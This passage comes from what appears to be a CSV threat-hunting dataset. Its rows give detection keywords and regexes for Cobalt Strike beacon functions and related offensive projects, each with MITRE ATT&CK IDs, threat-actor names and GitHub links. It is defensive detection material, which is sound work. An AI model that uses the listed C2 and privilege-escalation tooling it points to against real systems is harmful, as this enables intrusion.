Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_api.h*",".{0,1000}beacon_api\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. 
The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","0","N/A","10","10","223","41","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" "*beacon_bottom *",".{0,1000}beacon_bottom\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Beacon_Com_Struct*",".{0,1000}Beacon_Com_Struct.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" 
"*beacon_command_describe*",".{0,1000}beacon_command_describe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_command_detail(""remotepipelist""*",".{0,1000}beacon_command_detail\(\""remotepipelist\"".{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","#contentstrings","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*beacon_command_detail*",".{0,1000}beacon_command_detail.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","84","22","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*beacon_command_detail*",".{0,1000}beacon_command_detail.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - 
APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_command_register*",".{0,1000}beacon_command_register.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*beacon_command_register*",".{0,1000}beacon_command_register.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_commands*",".{0,1000}beacon_commands.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_compatibility.c*",".{0,1000}beacon_compatibility\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","426","68","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" "*beacon_compatibility.h*",".{0,1000}beacon_compatibility\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","426","68","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" "*beacon_elevator_describe*",".{0,1000}beacon_elevator_describe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_elevator_describe*",".{0,1000}beacon_elevator_describe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_elevator_register*",".{0,1000}beacon_elevator_register.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_elevator_register*",".{0,1000}beacon_elevator_register.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*beacon_elevator_register*",".{0,1000}beacon_elevator_register.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_elevators*",".{0,1000}beacon_elevators.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_elevators*",".{0,1000}beacon_elevators.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_endpoint*c2Get*",".{0,1000}beacon_endpoint.{0,1000}c2Get.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","0","N/A","10","10","64","16","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" "*beacon_endpoint*c2Post*",".{0,1000}beacon_endpoint.{0,1000}c2Post.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","0","N/A","10","10","64","16","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" "*beacon_execute_job*",".{0,1000}beacon_execute_job.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - 
FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_exploit_describe*",".{0,1000}beacon_exploit_describe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 